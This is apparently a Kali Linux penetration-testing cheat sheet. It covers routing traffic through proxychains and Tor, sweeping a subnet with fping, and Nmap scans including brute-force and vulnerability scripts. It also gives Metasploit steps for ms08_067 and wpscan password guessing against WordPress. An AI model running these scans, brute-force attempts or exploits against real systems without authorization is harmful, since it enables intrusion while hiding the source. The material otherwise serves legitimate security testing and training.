Kali Linux is a Debian-based Linux distribution aimed at advanced Penetration Testing and Security Auditing. Kali contains several hundred tools geared toward various information security tasks, such as Penetration Testing, Security Research, Computer Forensics and Reverse Engineering.
- KALI
- Parrot : Debian based – https://www.parrotsec.org/
- Athena : BlackArch – https://github.com/Athena-OS
1. Use Proxychains and Tor to access the Internet
1.1 Configure Proxychains
root@Kali:~# vi /etc/proxychains.conf
You can choose between dynamic_chain, strict_chain or random_chain; dynamic_chain is the usual choice because dead proxies are skipped instead of failing the connection. Also make sure the proxy_dns line further down in the file is uncommented, otherwise name lookups bypass the chain and reveal your real address.
# proxychains.conf VER 3.1
#
# HTTP, SOCKS4, SOCKS5 tunneling proxifier with DNS.
#
# The option below identifies how the ProxyList is treated.
# only one option should be uncommented at time,
# otherwise the last appearing option will be accepted
#
dynamic_chain
#
# Dynamic - Each connection will be done via chained proxies
# all proxies chained in the order as they appear in the list
# at least one proxy must be online to play in chain
# (dead proxies are skipped)
# otherwise EINTR is returned to the app
#
#strict_chain
#
# Strict - Each connection will be done via chained proxies
# all proxies chained in the order as they appear in the list
# all proxies must be online to play in chain
# otherwise EINTR is returned to the app
#
#random_chain
#
# Random - Each connection will be done via random proxy
# (or proxy chain, see chain_len) from the list.
# this option is good to test your IDS :)
You can also append some of your own known proxy servers at the end of the proxychains.conf file. The chain is followed in list order, so the last proxy in the list sees the real destination and any traffic that is not encrypted end to end; only list servers you control or trust.
# ProxyList format
# type host port [user pass]
# (values separated by 'tab' or 'blank')
#
#
# Examples:
#
# socks5 192.168.67.78 1080 lamer secret
# http 192.168.89.3 8080 justu hidden
# socks4 192.168.1.49 1080
# http 192.168.39.93 8080
#
#
# proxy types: http, socks4, socks5
# ( auth types supported: "basic"-http "user/pass"-socks )
#
[ProxyList]
# add proxy here ...
# meanwhile
# defaults set to "tor"
socks4 127.0.0.1 9050
socks5 98.26.2.3 1893
socks5 76.22.86.10 1658
1.2 Install Tor
You need a valid Kali repository in /etc/apt/sources.list, otherwise the install fails. The command below replaces the whole file with the kali-rolling entry (back it up first if it contains anything else), refreshes the package index and installs Tor:
echo "deb http://http.kali.org/kali kali-rolling main contrib non-free" > /etc/apt/sources.list && apt-get update && apt-get install tor -y && apt autoremove -y
Then start it with systemctl start tor and confirm something is listening on 127.0.0.1:9050 (ss -ltnp | grep 9050) before sending anything through proxychains.
1.3 Use Proxychains to access the Internet
You can run an nmap scan through Proxychains, which forces the connections through the proxies in your list. Proxychains only intercepts TCP connect() calls, so the default SYN scan (raw sockets when run as root), ICMP host discovery and OS detection go out directly from your real address. Use a TCP connect scan with host discovery and reverse DNS disabled:
proxychains nmap -sT -Pn -n scanme.nmap.org
You can also test Proxychains with Firefox and curl (the curl output should show the Tor exit address, not yours):
proxychains firefox www.duckduckgo.com
proxychains curl icanhazip.com
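As an added example, not from the original page, here is a shell script that checks a proxychains.conf the way sections 1.1 and 1.3 need it checked (exactly one chain mode active, proxy_dns on, every ProxyList entry well formed) and builds an nmap command line that really goes through the chain. The configuration it writes is a constructed sample modelled on the one shown above; the function names and the temporary file are this example's own.

```shell
#!/bin/sh
# Added example (not from the original page): validate a proxychains.conf and
# build an nmap invocation that cannot leak around the proxy chain.

# check_proxychains_conf FILE
# Succeeds only if exactly one chain mode is active, proxy_dns is enabled and
# every [ProxyList] entry is "type host port [user pass]" with a known type.
check_proxychains_conf() {
    conf=$1
    rc=0
    # drop comment and blank lines once; everything below works on $body
    body=$(sed -e '/^[[:space:]]*#/d' -e '/^[[:space:]]*$/d' "$conf")

    # proxychains silently takes the LAST mode if several are uncommented
    modes=$(printf '%s\n' "$body" \
        | grep -c -E '^(dynamic_chain|strict_chain|random_chain)[[:space:]]*$' || true)
    if [ "$modes" -ne 1 ]; then
        echo "error: $modes chain modes active, want exactly 1" >&2
        rc=1
    fi

    # without proxy_dns, name resolution goes straight out from your real IP
    if ! printf '%s\n' "$body" | grep -q -E '^proxy_dns[[:space:]]*$'; then
        echo "error: proxy_dns is commented out (DNS would leak)" >&2
        rc=1
    fi

    # everything after the [ProxyList] header is a proxy entry
    entries=$(printf '%s\n' "$body" | sed -n '/^\[ProxyList\]/,$p' | sed '1d')
    if [ -z "$entries" ]; then
        echo "error: [ProxyList] is empty" >&2
        rc=1
    fi
    printf '%s\n' "$entries" | awk '
        NF == 0 { next }
        $1 !~ /^(http|socks4|socks5)$/ { print "error: unknown proxy type: " $0 > "/dev/stderr"; bad = 1 }
        NF != 3 && NF != 5 { print "error: expected 3 or 5 fields: " $0 > "/dev/stderr"; bad = 1 }
        $3 !~ /^[0-9]+$/ || $3 + 0 < 1 || $3 + 0 > 65535 { print "error: bad port: " $0 > "/dev/stderr"; bad = 1 }
        END { exit bad }' || rc=1
    return $rc
}

# proxied_nmap_cmd NMAP-ARGS...
# proxychains only hooks connect(), so SYN/FIN/UDP scans, OS detection, ICMP
# ping and traceroute use raw sockets that bypass the proxy and expose your
# real address. Refuse those and force -sT (connect scan), -Pn (no host
# discovery) and -n (no reverse DNS outside the chain).
proxied_nmap_cmd() {
    for a in "$@"; do
        case $a in
            -sS|-sU|-sF|-sX|-sN|-sA|-sW|-sM|-sO|-sn|-sP|-O|-A|--traceroute)
                echo "error: $a needs raw sockets and would bypass proxychains" >&2
                return 1 ;;
        esac
    done
    printf 'proxychains nmap -sT -Pn -n %s\n' "$*"
}

# write_sample_conf FILE: constructed config mirroring section 1.1 (not a real file)
write_sample_conf() {
    cat > "$1" <<'EOF'
# proxychains.conf VER 3.1
dynamic_chain
proxy_dns
tcp_read_time_out 15000
tcp_connect_time_out 8000
[ProxyList]
# defaults set to "tor"
socks4 127.0.0.1 9050
socks5 98.26.2.3 1893
socks5 76.22.86.10 1658
EOF
}

# Offline demo: check the sample config, then build one good and one bad command.
demo_conf=$(mktemp)
write_sample_conf "$demo_conf"
check_proxychains_conf "$demo_conf" && echo "config OK: $demo_conf"
proxied_nmap_cmd -p 21,22,23,80 scanme.nmap.org
proxied_nmap_cmd -sS scanme.nmap.org || echo "refused, as intended"
rm -f "$demo_conf"
```

Run check_proxychains_conf /etc/proxychains.conf after every edit of the file; a second uncommented mode or a commented-out proxy_dns is exactly the kind of mistake that is invisible until a DNS request shows up outside the tunnel.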
Using proxychains to start msfconsole. Note the timeout on 127.0.0.1:9050 in this capture: Tor was not reachable when it was taken, so the DNS request could not be sent through the chain. Start Tor before launching anything through proxychains.
root@kali:~# proxychains msfconsole
ProxyChains-3.1 (http://proxychains.sf.net)
|DNS-request| 0.0.0.0
|S-chain|-<>-127.0.0.1:9050-<--timeout
|DNS-response|: 0.0.0.0 does not exist
[Metasploit ASCII-art banner]
Tired of typing 'set RHOSTS'? Click & pwn with Metasploit Pro
-- type 'go_pro' to launch it now.
=[ metasploit v4.7.0-2013082802 [core:4.7 api:1.0]
+ -- --=[ 1161 exploits - 641 auxiliary - 180 post
+ -- --=[ 310 payloads - 30 encoders - 8 nops
msf >
2. Find alive machines in the target network
-g generates the target list from the network/mask, -r 0 disables retries and -s prints the summary. The summary is written to stderr, which is why it survives the grep.
root@kali:~# fping -g -r 0 -s 192.168.2.0/24 | grep alive
192.168.2.1 is alive
192.168.2.2 is alive
192.168.2.4 is alive
192.168.2.31 is alive
192.168.2.50 is alive
192.168.2.200 is alive

     254 targets
       6 alive
     248 unreachable
       0 unknown addresses

     248 timeouts (waiting for response)
     254 ICMP Echos sent
       6 ICMP Echo Replies received
       0 other ICMP received

 4.49 ms (min round trip time)
 4.92 ms (avg round trip time)
 5.14 ms (max round trip time)
        3.288 sec (elapsed real time)
3. Use Nmap to scan targets
3.1 Scan a single target address
nmap 192.168.0.100
3.2 Scan several target addresses
nmap 192.168.0.100 192.168.0.105
3.3 Scan a range of target addresses
nmap 192.168.0.100-110
3.4 Scan the whole subnet the target address is on
nmap 192.168.0.0/24
3.5 Scan every target address listed in the host list targets.txt
nmap -iL targets.txt
3.6 Scan the subnet except one target address (the excluded address has to fall inside the scanned range)
nmap 192.168.0.0/24 --exclude 192.168.0.105
3.7 Scan the subnet except the target addresses listed in a file
nmap 192.168.0.0/24 --excludefile targets.txt
3.8 Scan ports 21, 22, 23 and 80 on a target address
nmap 192.168.0.100 -p 21,22,23,80
3.9 Trace the route to a target address
nmap --traceroute 192.168.0.105
3.10 Ping sweep: which hosts in the target's class C (/24) are online (-sP is the old spelling of -sn)
nmap -sP 192.168.0.0/24
3.11 OS fingerprinting of a target address
nmap -O 192.168.0.105
3.12 Version detection of the services a target address offers
nmap -sV 192.168.0.105
3.13 Probing the firewall state
In practice a FIN scan can be used to probe the state of a firewall. A FIN scan identifies closed ports: a RST reply means the port is closed, no reply means the port is open or filtered (open|filtered). It relies on RFC 793 behaviour, so Windows targets, which answer RST on every port, show everything as closed.
nmap -sF -T4 192.168.0.105
3.14 Authentication scan: --script=auth runs the NSE auth category against the target host or its subnet (anonymous logins, empty and default credentials; actual password guessing is the brute category below)
nmap --script=auth 192.168.0.105
3.15 Brute-force attack: nmap can guess simple passwords against databases, SMB, SNMP and other services
nmap --script=brute 192.168.0.105
3.16 Scan for common vulnerabilities: nmap can check whether a target host or subnet has well-known vulnerabilities
nmap --script=vuln 192.168.0.105
3.17 Application service scan: nmap ships scripts for many common services, for example VNC, MySQL, Telnet and Rsync; VNC as an example
nmap --script=realvnc-auth-bypass 192.168.0.105
3.18 Discover more services running on the local network (broadcast scripts):
nmap -n -p 445 --script=broadcast 192.168.0.105
3.19 whois lookup: use third-party databases and resources to query information about the target, for example a whois lookup (scripts in the external category contact third parties, so the target name is disclosed to them)
nmap --script external baidu.com
root@kali:~# nmap -T4 -O 192.168.2.31 192.168.2.200
Starting Nmap 7.60 ( https://nmap.org ) at 2019-01-19 21:35 EST
Nmap scan report for 192.168.2.31
Host is up (0.31s latency).
Not shown: 990 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
514/tcp filtered shell
3389/tcp open ms-wbt-server
5357/tcp open wsdapi
7070/tcp open realserver
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
Device type: general purpose
Running: Microsoft Windows XP|7|2012
OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_server_2012
OS details: Microsoft Windows XP SP3, Microsoft Windows XP SP3 or Windows 7 or Windows Server 2012
Nmap scan report for 192.168.2.200
Host is up (0.12s latency).
Not shown: 995 closed ports
PORT STATE SERVICE
80/tcp open http
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
514/tcp filtered shell
Aggressive OS guesses: Actiontec MI424WR-GEN3I WAP (99%), DD-WRT v24-sp2 (Linux 2.4.37) (98%), Linux 3.2 (97%), Linux 4.4 (97%), Microsoft Windows XP SP3 or Windows 7 or Windows Server 2012 (96%), Microsoft Windows XP SP3 (96%), BlueArc Titan 2100 NAS device (91%)
No exact OS matches for host (test conditions non-ideal).
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 2 IP addresses (2 hosts up) scanned in 136.89 seconds
root@kali:~#
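Added example, not from the original page: shell functions that turn the fping output from section 2 into an nmap target list and extract the open ports from nmap's greppable output (-oG), so the two steps chain into one pipeline. The fping and nmap text embedded below is constructed sample data modelled on the output above; the function names are this example's own.

```shell
#!/bin/sh
# Added example (not from the original page): from host discovery to open ports.

# alive_hosts: read fping output on stdin, print one alive IP per line.
# fping writes "<ip> is alive" lines to stdout and the -s statistics to
# stderr, so only the stdout side reaches this parser.
alive_hosts() {
    awk '$2 == "is" && $3 == "alive" { print $1 }'
}

# open_ports_gnmap: read nmap -oG output on stdin and print
# "<ip> <port>/<proto> <service>" for every port in state "open".
# -oG fields are tab separated; the Ports field holds comma separated
# entries of the form port/state/proto/owner/service/rpcinfo/version/.
# (A version string containing ", " would be split wrongly; -oG has no
# escaping for that, so parse -oX if you need service versions.)
open_ports_gnmap() {
    awk -F'\t' '
    /^Host:/ {
        split($1, h, " "); ip = h[2]
        for (i = 2; i <= NF; i++) {
            if ($i ~ /^Ports: /) {
                sub(/^Ports: /, "", $i)
                n = split($i, entry, ", ")
                for (j = 1; j <= n; j++) {
                    split(entry[j], f, "/")
                    if (f[2] == "open") print ip, f[1] "/" f[3], f[5]
                }
            }
        }
    }'
}

# Constructed sample of what "fping -g -r 0 -s 192.168.2.0/24" prints on stdout.
sample_fping() {
    printf '%s\n' \
        '192.168.2.1 is alive' \
        '192.168.2.2 is alive' \
        '192.168.2.4 is alive' \
        '192.168.2.31 is alive' \
        '192.168.2.50 is alive' \
        '192.168.2.200 is alive'
}

# Constructed sample of "nmap -oG - 192.168.2.200", matching the scan above.
sample_gnmap() {
    printf 'Host: 192.168.2.200 ()\tStatus: Up\n'
    printf 'Host: 192.168.2.200 ()\tPorts: 80/open/tcp//http///, 139/open/tcp//netbios-ssn///, 443/open/tcp//https///, 445/open/tcp//microsoft-ds///, 514/filtered/tcp//shell///\tIgnored State: closed (995)\n'
}

# Real pipeline (needs fping, nmap and the network):
#   fping -g -r 0 -a -q 192.168.2.0/24 > targets.txt   # -a -q: print only alive hosts
#   nmap -iL targets.txt -sV -oG scan.gnmap
#   open_ports_gnmap < scan.gnmap
# Offline demo with the constructed samples:
sample_fping | alive_hosts
sample_gnmap | open_ports_gnmap
```

The alive_hosts parser exists so the two steps can be scripted together; if you only ever want the list, fping -a -q already prints nothing but alive addresses. The filtered 514/tcp entry in the sample is deliberately dropped by open_ports_gnmap, since only state "open" is selected.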
4. MSF – Metasploit
4.1 Basic Usage and Steps
- search smb
- use exploit/windows/smb/ms08_067_netapi
- show options
- set RHOST 192.168.230.145 (newer Metasploit versions call this option RHOSTS; show options tells you which name the module expects)
- set target 41 (target IDs differ between module versions; show targets lists the current ones)
- check (where the module supports it, confirms the host is vulnerable without firing the exploit)
- exploit
4.2 YouTube – Kali Metasploit Exploit FTP Service on VSFTPD:
4.3 YouTube – Kali Metasploit Exploit Samba Service:
4.4. wpscan to attack WordPress
Use wpscan to start a simple scan of a WordPress site
root@localhost:~# wpscan -u 10.94.200.81
List WordPress users and vulnerable plugins
root@localhost:~# wpscan -u 10.94.200.81 -e u,vp
Use a wordlist to brute-force WordPress accounts
root@localhost:~# wpscan -u 10.94.200.81 -e u --wordlist /usr/share/wordlists/metasploit/common-roots.txt
These are wpscan 2.x flags; wpscan 3.x renamed them to --url, --enumerate and --passwords.
4.5. Exploit Windows 7 or Windows 2008 Servers
YouTube video: Using the EternalBlue Vulnerability to Exploit Windows 2008 Server